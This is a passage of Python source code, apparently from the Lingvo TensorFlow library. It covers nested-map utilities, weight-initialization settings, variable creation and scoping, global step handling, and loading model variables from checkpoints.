`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
default: Optional default value, defaults to None.
Returns:
The value for the given nested key or `default` if the key does not exist.
"""
try:
return self.GetItem(key)
# TypeError is raised when an intermediate item is a list and we try to
# access an element of it with a string.
except (KeyError, TypeError):
return default
def Set(self, key, value):
"""Sets the value for a nested key.
Note that indexing lists is not supported, names with underscores will be
considered as one key.
Args:
key: str of the form
`([A-Za-z_][A-Za-z0-9_]*)(.[A-Za-z_][A-Za-z0-9_]*)*.`.
value: The value to insert.
Raises:
ValueError if a sub key is not a NestedMap or dict.
"""
current = self
sub_keys = key.split('.')
for i, k in enumerate(sub_keys):
self.CheckKey(k)
# We have reached the terminal node, set the value.
if i == (len(sub_keys) - 1):
current[k] = value
else:
if k not in current:
current[k] = NestedMap()
if not isinstance(current[k], (dict, NestedMap)):
raise ValueError('Error while setting key {}. Sub key "{}" is of type'
' {} but must be a dict or NestedMap.'
''.format(key, k, type(current[k])))
current = current[k]
def _RecursiveMap(self, fn, flatten=False):
"""Traverse recursively into lists and NestedMaps applying `fn`.
Args:
fn: The function to apply to each item (leaf node).
flatten: If true, the result should be a single flat list. Otherwise the
result will have the same structure as this NestedMap.
Returns:
The result of applying fn.
"""
def Recurse(v, key=''):
"""Helper function for _RecursiveMap."""
if isinstance(v, NestedMap):
ret = [] if flatten else NestedMap()
deleted = False
for k in sorted(v.keys()):
res = Recurse(v[k], key + '.' + k if key else k)
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret[k] = res
if not ret and deleted:
return self._DELETE
return ret
elif isinstance(v, list):
ret = []
deleted = False
for i, x in enumerate(v):
res = Recurse(x, '%s[%d]' % (key, i))
if res is self._DELETE:
deleted = True
continue
elif flatten:
ret += res
else:
ret.append(res)
if not ret and deleted:
return self._DELETE
return ret
else:
ret = fn(key, v)
if flatten:
ret = [ret]
return ret
res = Recurse(self)
if res is self._DELETE:
return [] if flatten else NestedMap()
return res
def Flatten(self):
"""Returns a list containing the flattened values in the `.NestedMap`.
Unlike py_utils.Flatten(), this will only descend into lists and NestedMaps
and not dicts, tuples, or namedtuples.
"""
return self._RecursiveMap(lambda _, v: v, flatten=True)
def FlattenItems(self):
"""Flatten the `.NestedMap` and returns <key, value> pairs in a list.
Returns:
A list of <key, value> pairs, where keys for nested entries will be
represented in the form of `foo.bar[10].baz`.
"""
return self._RecursiveMap(lambda k, v: (k, v), flatten=True)
def Pack(self, lst):
"""Returns a copy of this with each value replaced by a value in lst."""
assert len(self.FlattenItems()) == len(lst)
v_iter = iter(lst)
return self._RecursiveMap(lambda unused_k, unused_v: next(v_iter))
def Transform(self, fn):
"""Returns a copy of this `.NestedMap` with fn applied on each value."""
return self._RecursiveMap(lambda _, v: fn(v))
def IsCompatible(self, other):
"""Returns true if self and other are compatible.
If x and y are two compatible `.NestedMap`, `x.Pack(y.Flatten())` produces y
and vice versa.
Args:
other: Another `.NestedMap`.
"""
items = self._RecursiveMap(lambda k, _: k, flatten=True)
other_items = other._RecursiveMap(lambda k, _: k, flatten=True) # pylint: disable=protected-access
return items == other_items
def Filter(self, fn):
"""Returns a copy with entries where fn(entry) is True."""
return self.FilterKeyVal(lambda _, v: fn(v))
def FilterKeyVal(self, fn):
"""Returns a copy of this `.NestedMap` filtered by fn.
If fn(key, entry) is True, the entry is copied into the returned NestedMap.
Otherwise, it is not copied.
Args:
fn: a callable of (string, entry)->boolean.
Returns:
A `.NestedMap` contains copied entries from this `'.NestedMap`.
"""
return self._RecursiveMap(lambda k, v: v if fn(k, v) else self._DELETE)
def _ToStrings(self):
"""Returns debug strings in a list for this `.NestedMap`."""
kv = self.FlattenItems()
maxlen = max([len(k) for k, _ in kv]) if kv else 0
return sorted([k + ' ' * (4 + maxlen - len(k)) + str(v) for k, v in kv])
def DebugString(self):
"""Returns a debug string for this `.NestedMap`."""
return '\n'.join(self._ToStrings())
def VLog(self, level=None, prefix=None):
"""Logs the debug string at the level."""
if level is None:
level = 0
if prefix is None:
prefix = 'nmap: '
for l in self._ToStrings():
tf.logging.vlog(level, '%s %s', prefix, l)
class _Unique(object):
"""A helper to uniqify variables in a NestedMap."""
def __init__(self):
self._vset = set()
def __call__(self, v):
if (v is None) or (v in self._vset):
return False
else:
self._vset.add(v)
return True
def ToUniqueList(nmap):
"""Returns the flattened `nmap` with duplicates removed."""
return nmap.Filter(_Unique()).Flatten()
def ReadOnlyAttrDictView(backing):
"""Wraps a dict to provide a read-only view of its contents.
Dict keys can also be accessed by attribute.
Args:
backing: Dict-like object to wrap.
Returns:
Read-only Mapping that can be accessed by index (['foo']) or attr (d.foo).
"""
class Wrapper(object):
"""Wrapper object."""
# Disable pytype attribute checking.
_HAS_DYNAMIC_ATTRIBUTES = True
def __getitem__(self, key):
return backing[key]
def __len__(self):
return len(backing)
def __iter__(self):
return iter(backing)
def __getattr__(self, key):
return backing[key]
def __hasattr__(self, key):
return key in backing
def __setattr__(self, key, value):
raise AttributeError('Dictionary is read-only.')
def __setitem__(self, key, value):
raise AttributeError('Dictionary is read-only.')
return Wrapper()
def ToStaticShape(shape):
"""Converts 'shape' to a static shape."""
if isinstance(shape, (list, tuple)):
shape = [
dim.value if isinstance(dim, tf.Dimension) else dim for dim in shape
]
static_shape = []
for dim in shape:
if symbolic.IsExpr(dim):
static_shape.append(symbolic.ToStatic(dim))
else:
static_shape.append(dim)
return static_shape
else:
return shape.value if isinstance(shape, tf.Dimension) else shape
def Zeros(shape, *args, **kwargs):
return tf.zeros(ToStaticShape(shape), *args, **kwargs)
class UniformSampler(object):
"""A reservoir sampler.
This class implements reservoir sampling: Given a limit of `num_samples` total
samples, this class maintains a uniform probability (1 / `num_samples`) of
keeping any item dynamically added to the sampler.
See https://en.wikipedia.org/wiki/Reservoir_sampling for details.
"""
def __init__(self, num_samples):
assert num_samples > 0
self._num_samples = num_samples
self._num_seen_items = 0
self._samples = []
def Add(self, item):
"""Add item to sampler."""
self._num_seen_items += 1
if len(self._samples) < self._num_samples:
self._samples.append(item)
return
index = np.random.randint(0, self._num_seen_items)
if index < self._num_samples:
self._samples[index] = item
@property
def samples(self):
"""Fetch the current samples from the sampler."""
return self._samples
class RNNCellStateInit(object):
"""State initialization functions for RNN cell init state."""
@staticmethod
def _Params(method, seed):
p = hyperparams.Params()
p.Define('method', method,
'Initialization method. Should be one of zeros, random_normal.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Zeros():
"""tf.zeros()."""
return RNNCellStateInit._Params('zeros', seed=None)
@staticmethod
def RandomNormal(seed=None):
"""tf.random.normal()."""
return RNNCellStateInit._Params('random_normal', seed)
def DefaultRNNCellStateInit():
return RNNCellStateInit.Zeros()
def InitRNNCellState(shape, init=None, dtype=None, name=None, is_eval=False):
"""Initial state definitions for RNN cell implementations.
Args:
shape: A array of ints/symbols for specifying the shape of the state.
init: Hyperparameters as returned by one of the static implemetaitons in
RNNCellStateInit.
dtype: The dype of the states. Defaults to tf.float32.
name: An optional name for the operation.
is_eval: Bool, set to True if we need special behavior in eval mode.
Returns:
A Tensor of the specified shape, and sampled from the distribution as
defined by the init parameters.
"""
shape = ToStaticShape(shape)
if init is None:
init = DefaultRNNCellStateInit()
if dtype is None:
dtype = tf.float32
method = init.method
if ((method in ['zeros']) or (method in ['random_normal'] and is_eval)):
init_state = tf.zeros(shape=shape, dtype=dtype, name=name)
elif method in ['random_normal']:
init_state = tf.random.normal(
shape=shape, dtype=dtype, name=name, seed=init.seed)
else:
raise ValueError('Initialization method (%s) not supported.' % method)
return init_state
class WeightInit(object):
"""Static class providing weight initialization config params."""
@staticmethod
def _Params(method, scale, seed):
p = hyperparams.Params()
p.Define('method', method, 'Initialization method.')
p.Define('scale', scale, 'Initialization scale.')
p.Define('seed', seed, 'Random seed used to generate initial values.')
p.Freeze()
return p
@staticmethod
def Gaussian(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1.0)."""
return WeightInit._Params('gaussian', scale, seed)
@staticmethod
def Uniform(scale=1.0, seed=None):
"""scale * tf.random_uniform(-1.0, 1.0)."""
return WeightInit._Params('uniform', scale, seed)
@staticmethod
def UniformPositive(scale=1.0, seed=None):
"""scale * tf.random_uniform(0., 1.0)."""
return WeightInit._Params('uniform_positive', scale, seed)
@staticmethod
def Xavier(scale=1.0, seed=None):
"""Xavier initialization (x = sqrt(6. / (in + out)); [-x, x])."""
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def XavierWithFixupParams(scale=1.0,
depth=1.0,
layers_per_residual_block=1.0,
seed=None):
"""Xavier initialization with Fixup."""
scale = scale * math.pow(depth, (-1.0 / (2 * layers_per_residual_block)))
return WeightInit._Params('xavier', scale, seed)
@staticmethod
def GeoMeanXavier(scale=1.0, seed=None):
"""A variant of Xavier (x = sqrt(3. / sqrt(in * out)); [-x, x])."""
return WeightInit._Params('geo_mean_xavier', scale, seed)
@staticmethod
def Constant(scale=1.0):
"""scale."""
return WeightInit._Params('constant', scale, 0)
@staticmethod
def TruncatedGaussian(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1.0)."""
return WeightInit._Params('truncated_gaussian', scale, seed)
@staticmethod
def GaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('gaussian_sqrt_dim', scale, seed)
@staticmethod
def GaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('gaussian_sqrt_fanin', scale, seed)
@staticmethod
def GaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.random_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('gaussian_sqrt_fanout', scale, seed)
@staticmethod
def UniformSqrtDim(scale=1.0, seed=None):
"""scale * tf.uniform(-1 / sqrt(dim0), 1 / sqrt(dim0))."""
return WeightInit._Params('uniform_sqrt_dim', scale, seed)
@staticmethod
def UniformUnitScaling(scale=1.0, seed=None):
"""scale * sqrt(3) / sqrt(dim0) * tf.uniform(-1, 1)."""
return WeightInit._Params('uniform_unit_scaling', scale, seed)
@staticmethod
def TruncatedGaussianSqrtDim(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(dim0))."""
return WeightInit._Params('truncated_gaussian_sqrt_dim', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanIn(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(fan_in))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanin', scale, seed)
@staticmethod
def TruncatedGaussianSqrtFanOut(scale=1.0, seed=None):
"""scale * tf.truncated_normal(0, 1 / sqrt(fan_out))."""
return WeightInit._Params('truncated_gaussian_sqrt_fanout', scale, seed)
@staticmethod
def KaimingUniformFanInRelu(scale=1.0, seed=None):
return WeightInit._Params('kaiming_uniform_fanin_relu', scale, seed)
@staticmethod
def KaimingUniformFanInLeakyRelu(scale=np.sqrt(5.), seed=None):
return WeightInit._Params('kaiming_uniform_fanin_leakyrelu', scale, seed)
_DEFAULT_XAVIER_INIT = 1.000001
def DefaultParamInit():
# Here we use 1.000001 as a signature for user picking up the
# default param initializer.
return WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
def IsDefaultParamInit(p):
return (p.method == 'xavier' and p.scale == _DEFAULT_XAVIER_INIT and
p.seed is None)
def WeightParams(shape, init=None, dtype=None, collections=None):
"""Returns a hyperparams for a weight variable given the shape/init/dtype."""
if init is None:
init = WeightInit.Xavier(_DEFAULT_XAVIER_INIT)
if dtype is None:
dtype = tf.float32
if collections is None:
collections = []
p = hyperparams.Params()
p.Define('dtype', dtype, 'The weight data type.')
p.Define('shape', shape, 'The weight shape.')
p.Define('init', init, 'Initialization method.')
p.Define('collections', collections,
'Variable collections this weight belongs to.')
return p
def FindNeeded(endpoints):
"""List names of tensors and operations required to compute endpoints."""
names_seen = set()
queue = []
for e in Flatten(endpoints):
if isinstance(e, tf.Operation):
queue.append(e)
else:
queue.append(e.op)
while queue:
op = queue.pop()
name = op.name
if name not in names_seen:
names_seen.add(name)
names_seen.update((o.name for o in op.outputs))
queue.extend(i.op for i in op.inputs)
queue.extend(op.control_inputs)
return names_seen
def FindNeededInList(tensor_list, endpoints):
"""Return tensors from tensor_list needed to compute any of endpoints."""
all_needed = FindNeeded(endpoints)
return [t for t in tensor_list if t.name in all_needed]
class _CollectionGetter(object):
"""Get graph local value from a defined collection."""
def __init__(self, key, default_factory):
self._key = key
self._default_factory = default_factory
def __call__(self):
collection = tf.get_collection(self._key)
if collection:
assert len(collection) == 1
return collection[0]
value = self._default_factory()
tf.add_to_collection(self._key, value)
return value
def SanitizeScopeKey(key):
"""Removes invalid symbols from name_scope keys."""
return key.replace('[', '_').replace(']', '')
# Global variable to control multitask variable reuse
# If False (default) the default tf.get_variable is used, that is:
# - Reusing scopes only allow getting existing variables
# - Non-reusing scopes only allow getting new variables
# With OPPORTUNISTIC_VARIABLE_REUSE==True:
# - Reusing scopes only allow getting existing variables, as usual
# - Non-reusing scopes reuse new variables or get new ones
_OPPORTUNISTIC_VARIABLE_REUSE_KEY = ('__lingvo_opportunistic_variable_reuse',)
_get_opportunistic_variable_reuse = _CollectionGetter(
_OPPORTUNISTIC_VARIABLE_REUSE_KEY, lambda: [False])
_VARIABLE_RENAME_RULES_KEY = ('__lingvo_variable_rename_rules',)
_get_rename_rules_stack = _CollectionGetter(_VARIABLE_RENAME_RULES_KEY,
lambda: [])
@contextlib.contextmanager
def OpportunisticVariableReuseScope(enable_opportunistic_reuse=True):
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
old_val = opportunistic_var_reuse[0]
opportunistic_var_reuse[0] = enable_opportunistic_reuse
yield
opportunistic_var_reuse[0] = old_val
def GetOpportunisticVariableReuse():
"""Get the current variable reuse setting."""
opportunistic_var_reuse = _get_opportunistic_variable_reuse()
return opportunistic_var_reuse[0]
@contextlib.contextmanager
def VariableRenameScope(renames):
"""Append the renaming rules to the stack of renames.
Args:
renames: pairs of (regexp, new_name_format). If the regexp matches, the
new_name_format will be interpolated using the matched groups.
Yields:
scope in which the renaming rules are applied
"""
rename_rules_stack = _get_rename_rules_stack()
rename_rules_stack.append(renames)
yield
rename_rules_stack.pop()
def GetVariableName(name):
"""Get variable name after application of all renaming rules.
Args:
name: untransformed variable name with scope_name prepended
Returns:
name possibly modified using renaming rules
"""
matched = False
new_name = name
for renames in _get_rename_rules_stack():
for regexp, name_format in renames:
match = re.match(regexp, name)
if match:
if matched:
tf.logging.warning('Multiple matches for: %s', name)
matched = True
new_name = name_format % match.groups()
if new_name != name:
tf.logging.info("WARNING!!! Renaming variable '%s' to '%s'", name, new_name)
return new_name
def GenerateSeedFromName(name):
"""Generate a random seed from a name string."""
md5 = hashlib.md5()
md5.update(six.ensure_binary(name))
return int(md5.hexdigest(), 16) % (2**31 - 1)
# To keep track of all the variables ever gets created by the CreateVariable
# routine below.
_ALL_VARS_KEY = ('__lingvo_all_vars',)
_get_all_vars = _CollectionGetter(_ALL_VARS_KEY, lambda: {})
_VARIABLE_SHAPE_PREFIXES = _ThreadLocalStack().stack
@contextlib.contextmanager
def VariableShapePrefixContext(shape_prefix):
"""Add a shape prefix to variable created by CreateVariable().
Args:
shape_prefix: a positive integer of shape prefix.
Yields:
None.
"""
assert shape_prefix > 0, ('%s' % shape_prefix)
_VARIABLE_SHAPE_PREFIXES.append(shape_prefix)
yield
_VARIABLE_SHAPE_PREFIXES.pop()
def GetVariableShapePrefixes():
"""Return the list of shape prefixes for CreateVariable()."""
return _VARIABLE_SHAPE_PREFIXES
def GetFanInFanOut(shape):
"""Returns (fan_in, fan_out) of a weight variable of the give shape."""
if not shape:
return None, None
if len(shape) < 1:
return 1, 1
elif len(shape) == 1:
# Following _compute_fans() from TF's init_ops.py.
return shape[0], shape[0]
else:
receptive_field_size = 1
for s in shape[:-2]:
receptive_field_size *= s
fan_in = shape[-2] * receptive_field_size
fan_out = shape[-1] * receptive_field_size
return fan_in, fan_out
# TODO(yonghui): Add support for partitioned Variables.
def CreateVariable(name,
params,
reuse=None,
trainable=True,
init_wrapper=None,
collections=None,
default_seed=None,
synchronization=tf.VariableSynchronization.AUTO,
aggregation=tf.VariableAggregation.NONE):
"""Creates tf.Variable according to param_config.
Args:
name: A string, name of the variable.
params: A WeightParams specifying the details of how this variable should be
constructed and initialized.
reuse: Whether or not to reuse an existing variable. It has the same
semantics as the reuse arg in tf.variable_scope.
trainable: Whether or not the variable is trainable.
init_wrapper: a callback which takes a tf initializer callable and returns a
tensor. It is used when shape of the variable isn't statically
determinable.
collections: Override the default variable collection (
tf.GraphKeys.GLOBAL_VARIABLES).
default_seed: Seed to use for initialization if not specified in params.
Used for deterministic initialization in tests.
synchronization: Indicates when a distributed a variable will be aggregated.
Accepted values are constants defined in the class
tf.VariableSynchronization. By default the synchronization is set to AUTO
and the current DistributionStrategy chooses when to synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class tf.VariableAggregation.
Returns:
tf.identity(var), var pair. The tf.identity() node is colocated
with var. In the case of FLAGS.no_identity_on_vars, simply returns
a var, var pair.
"""
p = params.Copy()
assert isinstance(p, hyperparams.Params)
dtype = p.dtype
shape = tf.TensorShape(ToStaticShape(p.shape)).as_list()
p.Set(shape=shape)
dim0 = 1
if shape:
assert all([dim_size > 0 for dim_size in shape]), shape
dim0 = shape[0]
assert p.init.method == 'constant' or np.all(np.asarray(p.init.scale) >= 0)
method = p.init.method
scale = p.init.scale
seed = p.init.seed
if IsDefaultParamInit(p.init):
tf.logging.warning(
'WARNING!!! var %s is using the default xavier initializer.'
' Make sure this is intended.', name)
if tf.get_default_graph().seed is not None:
# We are in a program/test which need determistic randomization.
if seed is None:
if default_seed is not None:
seed = default_seed
else:
# We are not given a per-variable random seed. We use hash of
# variable name as a stable random seed.
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
seed = GenerateSeedFromName(var_name)
if (method in [
'gaussian_sqrt_dim', 'uniform_sqrt_dim', 'truncated_gaussian_sqrt_dim'
]):
if len(shape) > 2:
# This is probably not the right method to use when len(shape) > 2,
# e.g. dim0 will be 3 with a 3x3 conv2d kernel.
tf.logging.warning(
'Initializing %s of shape %s with method %s: dim0=%s. '
'Make sure that it is intended.', name, shape, method, dim0)
scale *= 1.0 / math.sqrt(dim0)
if method in ['gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanin']:
fan_in, _ = GetFanInFanOut(shape)
if fan_in is not None:
scale *= 1.0 / math.sqrt(fan_in)
if method in ['gaussian_sqrt_fanout', 'truncated_gaussian_sqrt_fanout']:
_, fan_out = GetFanInFanOut(shape)
if fan_out is not None:
scale *= 1.0 / math.sqrt(fan_out)
init_dtype = dtype.real_dtype
if method in [
'gaussian', 'gaussian_sqrt_dim', 'gaussian_sqrt_fanin',
'gaussian_sqrt_fanout'
]:
v_init = tf.random_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform', 'uniform_sqrt_dim']:
v_init = tf.random_uniform_initializer(
minval=-scale, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_positive']:
v_init = tf.random_uniform_initializer(
minval=0.0, maxval=scale, seed=seed, dtype=init_dtype)
elif method in ['uniform_unit_scaling']:
v_init = tf.uniform_unit_scaling_initializer(
factor=scale, seed=seed, dtype=init_dtype)
elif method in [
'truncated_gaussian', 'truncated_gaussian_sqrt_dim',
'truncated_gaussian_sqrt_fanin', 'truncated_gaussian_sqrt_fanout'
]:
v_init = tf.truncated_normal_initializer(
mean=0.0, stddev=scale, seed=seed, dtype=init_dtype)
elif method in ['constant']:
v_init = tf.constant_initializer(value=scale, dtype=init_dtype)
elif method in ['xavier', 'geo_mean_xavier']:
# pylint: disable=unused-argument
def XavierUniform(shape, dtype, partition_info):
"""Xavier initialization (x = sqrt(6. / (in + out)); scale*[-x, x])."""
if not shape:
raise ValueError(
'\'shape\' must not be \'None\' or 0 for XavierUniform')
fan_in, fan_out = GetFanInFanOut(shape)
if method == 'xavier':
limit = math.sqrt(6. / (fan_in + fan_out))
elif method == 'geo_mean_xavier':
limit = math.sqrt(3. / math.sqrt(fan_in * fan_out))
return scale * tf.random_uniform(shape, -limit, limit, dtype, seed)
# pylint: enable=unused-argument
v_init = XavierUniform
elif method in [
'kaiming_uniform_fanin_relu', 'kaiming_uniform_fanin_leakyrelu'
]:
fan_in = np.prod(shape[:-1])
if method == 'kaiming_uniform_fanin_leakyrelu':
# Assume the 'a' parameter is the 'scale' argument.
gain = np.sqrt(2. / (1 + scale**2))
else:
gain = np.sqrt(2.)
std_dev = gain / np.sqrt(fan_in)
bound = np.sqrt(3.0) * std_dev
v_init = tf.random_uniform_initializer(
minval=-bound, maxval=bound, seed=seed, dtype=init_dtype)
else:
assert False, 'init_type not supported.'
if init_wrapper:
assert shape is None, (
'Expecting \'params.shape\' being None when '
'\'init_wrapper\' is specified, instead getting %s') % p.shape
# Later variable will init from Tensor value instead of intializer callable.
v_init = init_wrapper(init_dtype, v_init)
if dtype == tf.complex64:
def ComplexWrapper(init):
def _Wrapper(shape, dtype, partition_info):
# A more complex alternative may be to use the init function for
# magnitudes and uniform random for phases instead.
shape = [2] + shape
value = init(shape, init_dtype, partition_info)
return tf.complex(value[0], value[1])
return _Wrapper
v_init = ComplexWrapper(v_init)
# TODO(yonghui): Possibly get away from variable_scope and implement our own
# variable sharing mechanism.
def GetVar(reuse=reuse):
"""reuse: Whether to reuse the variables."""
if shape is not None:
var_shape = GetVariableShapePrefixes() + list(shape)
else:
var_shape = None
with tf.variable_scope(name) as scope:
var_name = GetVariableName(scope.name)
var_scope = tf.VariableScope(
scope.reuse,
custom_getter=scope.custom_getter,
caching_device=scope.caching_device,
use_resource=scope.use_resource or use_resource_variables())
with tf.variable_scope(var_scope), \
tf.variable_scope(var_name, reuse=reuse) as scope:
if _FromGlobal('pin_vars_to_cpu'):
with tf.device('/cpu:0'):
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
else:
return tf.get_variable(
'var',
var_shape,
dtype,
v_init,
collections=collections,
trainable=trainable,
validate_shape=True if var_shape is not None else False,
synchronization=synchronization,
aggregation=aggregation)
if _get_opportunistic_variable_reuse()[0]:
try:
var = GetVar()
except ValueError: # Possibly the variable already exists
var = GetVar(reuse=True)
else:
var = GetVar()
var_ref = var.experimental_ref() # For key in dict/set.
all_vars = _get_all_vars()
if var_ref in all_vars:
tf.logging.info('Reusing var %s', var.name)
cached = all_vars[var_ref]
assert cached == p, ('Cached config:\n %s vs new config:\n %s' %
(cached.ToText(), p.ToText()))
else:
tf.logging.info('Creating var %s shape=%s on device %s', var.name,
var.shape, var.device)
all_vars[var_ref] = p.Copy()
for col in p.collections:
tf.add_to_collection(col, var)
if _FromGlobal('no_identity_on_vars'):
with tf.device(var.device):
return var, var
else:
# This tf.identity colocated with var.
with tf.device(var.device):
return tf.identity(var), var
_global_variable_scope = None
def GetGlobalVariableScope():
"""Gets the global variable scope (as if no variable_scope has been set).
Returns:
The VariableScope corresponding to as if no tf.variable_scope is in effect.
"""
if not _global_variable_scope:
# Each thread gets its own default global variable scope, and we take
# advantage of that in order to get a top-level scope. This avoids the
# need to call tf.get_variable_scope() at the module level, which allows
# this module to be imported without modifying global state (i.e. creating
# the default graph). It is important to not mutate the global state at
# module load time, because it let's us flip flags after import that affect
# core TensorFlow behavior.
def Initialize():
global _global_variable_scope
_global_variable_scope = tf.get_variable_scope()
t = threading.Thread(target=Initialize)
t.start()
t.join()
return _global_variable_scope
_GLOBAL_STEP_STACK = []
@contextlib.contextmanager
def GlobalStepContext(global_step_tensor):
_GLOBAL_STEP_STACK.append(global_step_tensor)
try:
yield
except:
raise
finally:
_GLOBAL_STEP_STACK.pop()
def GetGlobalStep():
"""Return the global_step."""
if _GLOBAL_STEP_STACK:
return _GLOBAL_STEP_STACK[-1]
return tf.train.get_global_step()
def GetOrCreateGlobalStepVar():
"""Return the global_step variable, creating it if it does not exist.
Prefer GetGlobalStep if a tensor rather than a tf.Variable is sufficient.
Returns:
The global_step variable, or a new created one if it does not exist.
"""
with tf.variable_scope(
GetGlobalVariableScope(), use_resource=use_resource_variables()):
return tf.train.get_or_create_global_step()
def LogMultiLines(label, lines):
if not isinstance(lines, (list, tuple)):
lines = lines.split('\n')
for line in lines:
tf.logging.info('%s: %s', label, line)
def _LogPlacement(label, theta, copy):
"""Logs theta and its copy's device placement."""
def GetDevices(m):
"""Flatten a `.NestedMap` m and extracts each value's device."""
return [x.device for x in m.Flatten()]
tf.logging.info('=== %s ===', label)
LogMultiLines(
label,
theta.Pack([('%s -> %s' % (x[0], x[1]))
for x in zip(GetDevices(theta), GetDevices(copy))
]).DebugString())
tf.logging.info('==========')
def CreateLocalTheta(theta, device_list=None, label=None):
"""Creates local copy of theta and shards across devices device list.
Leaves variables intact.
Args:
theta: a `.NestedMap` of variables.
device_list: list of devices to shard across. If None, defaults to a list
[''].
label: Logging label.
Returns:
A `.NestedMap` of identity() wrapped theta
"""
class AddIdentity(object):
def __init__(self, device_list):
self._list = device_list if device_list else ['']
self._index = 0
def __call__(self, x):
if isinstance(x, tf.Variable):
return x
with tf.device(self._list[self._index % len(self._list)]):
self._index += 1
return tf.identity(x)
copy = theta.Transform(AddIdentity(device_list))
_LogPlacement(label, theta, copy)
return copy
def _GetVarsToLoad(all_vars, variable_loading_rules, var_ignore_rules):
"""Determines variables to load and their names in checkpoint."""
# This list contains mappings from var names as they appear in the checkpoint
# to the vars in our model they correspond to.
vars_to_load = []
for model_var in all_vars:
for regexp, name_format in variable_loading_rules:
match = re.match(regexp, model_var.name)
# Skip if var doesn't match the loading rules, or if it should be ignored.
if not match or any(
re.match(r, model_var.name) for r in var_ignore_rules):
continue
checkpoint_var_name = name_format % match.groups()
if checkpoint_var_name.endswith(':0'):
checkpoint_var_name = checkpoint_var_name[:-2]
tf.logging.info('Loading %s from %s', model_var, checkpoint_var_name)
vars_to_load.append((checkpoint_var_name, model_var))
break
return vars_to_load
def OverrideVarsFromCheckpoint(sess, all_vars, checkpoint_path,
variable_loading_rules, var_ignore_rules):
"""Overrides variables from a provided checkpoint."""
vars_to_load = _GetVarsToLoad(all_vars, variable_loading_rules,
var_ignore_rules)
if not vars_to_load:
raise ValueError(('Variable loading rules did not match any vars. '
'All known: %r') % [v.name for v in all_vars])
load_var_names = sorted([v.name for _, v in vars_to_load])
tf.logging.info('Overriding vars from checkpoint: %r', load_var_names)
while vars_to_load:
# When restoring, it's possible the same value in the checkpoint
# can be restored to multiple variables (e.g. during
# distillation). However, tf.train.Saver, since it's used for
# both saving and restoring, requires the name in the checkpoint
# to be unique for each variable. So, we call it multiple times
# with a unique set of names each time.
unique_vars_to_load = {}
remaining_vars_to_load = []
for k, v in vars_to_load:
if k not in unique_vars_to_load:
unique_vars_to_load[k] = v
else:
remaining_vars_to_load.append((k, v))
tf.train.Saver(var_list=unique_vars_to_load).restore(sess, checkpoint_path)
vars_to_load = remaining_vars_to_load
def OverrideVarsFromCheckpoints(session, all_vars, ckpts_loading_rules):
"""Overrides model variables from checkpoints.
Args:
session: Tensorflow session.
all_vars: List of all the parameters in the model.
ckpts_loading_rules: A dictionary of checkpoint path: loading rules.
Checkpoint path must be a path to a pretrained model, and loading rules is
expected to be a tuple of two lists. The first consisting of tuples of
strings defining (regex to match parameter names in the model to override,
format string to determine the corresponding var in the checkpoint), and
the second list consisting of a list of regexes to match parameter names
in the model which should not be overridden, even if they match those in
the loading rules.
Raises:
ValueError: if colliding vars exist or loading rules is not a list.
"""
if len(ckpts_loading_rules) > 1:
tf.logging.info('Overriding vars from multiple checkpoints.')
var_refs_overridden = set()
for ckpt_path, loading_rules in ckpts_loading_rules.items():
tf.logging.info('Overriding vars from checkpoint: %s', ckpt_path)
if not isinstance(loading_rules, tuple):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
if len(loading_rules) != 2 or not all(
isinstance(l, list) for l in loading_rules):
raise ValueError('Loading rules for %s must be a tuple of two lists!' %
ckpt_path)
# Filter the model variables to be overridden.
var_refs_to_override = [
var[1].experimental_ref()
for var in _GetVarsToLoad(all_vars, loading_rules[0], loading_rules[1])
]
overlap_refs = set.intersection(var_refs_overridden, var_refs_to_override)
if overlap_refs:
raise ValueError('Colliding variables to override: %s' % overlap_refs)
OverrideVarsFromCheckpoint(session, all_vars, ckpt_path, loading_rules[0],
loading_rules[1])
var_refs_overridden.update(var_refs_to_override)
tf.logging.info('Model variables overridden: %s', var_refs_overridden)
def ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients):
return tf.gradients(
loss,
all_vars,
aggregation_method=grad_aggregation_method,
colocate_gradients_with_ops=colocate_gradients_with_ops,
gate_gradients=gate_gradients)
def ComputeTpuEmbeddingGradients(loss, activation_dict, tpu_embedding):
"""Returns a TpuEmbedding SendGradient op.
Args:
loss: The loss to backprop from.
activation_dict: String feature -> embedding activations dict.
tpu_embedding: TPUEmbedding instance.
"""
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
grads = tf.gradients(loss, list(activation_dict.values()))
feature_to_gradient_dict = py_collections.OrderedDict(
zip(list(activation_dict.keys()), grads))
send_gradient_op = tpu_embedding.generate_send_gradients_op(
feature_to_gradient_dict)
return send_gradient_op
def _ComputeGradientsTpu(loss,
all_vars,
grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients,
